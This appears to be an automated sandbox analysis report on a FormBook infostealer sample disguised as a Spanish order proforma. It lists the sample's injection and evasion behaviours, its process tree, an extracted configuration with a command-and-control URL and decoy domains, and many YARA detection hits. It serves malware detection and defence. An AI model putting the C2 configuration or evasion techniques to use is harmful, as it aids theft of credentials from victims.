Play interactive tour

Edit tour

Windows Analysis Report Se adjunta el pedido, proforma.exe

Overview

General Information

Sample Name:	Se adjunta el pedido, proforma.exe
Analysis ID:	528688
MD5:	deea7525a547ed7a9ef6c81b04478f3e
SHA1:	b29c935913a55c9bad3979d05d97a6ebda871604
SHA256:	413e8df7f149aa643aaa1ef70e953ab2112827b652f1cf05b6420ed6a119962d
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Se adjunta el pedido, proforma.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe" MD5: DEEA7525A547ED7A9EF6C81B04478F3E)

mobsync.exe (PID: 6648 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

Lxtcsmeg.exe (PID: 5740 cmdline: "C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe" MD5: DEEA7525A547ED7A9EF6C81B04478F3E)

logagent.exe (PID: 5048 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)

Lxtcsmeg.exe (PID: 6868 cmdline: "C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe" MD5: DEEA7525A547ED7A9EF6C81B04478F3E)

mobsync.exe (PID: 5036 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)

cscript.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

cmd.exe (PID: 6384 cmdline: /c del "C:\Windows\SysWOW64\mobsync.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 740 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
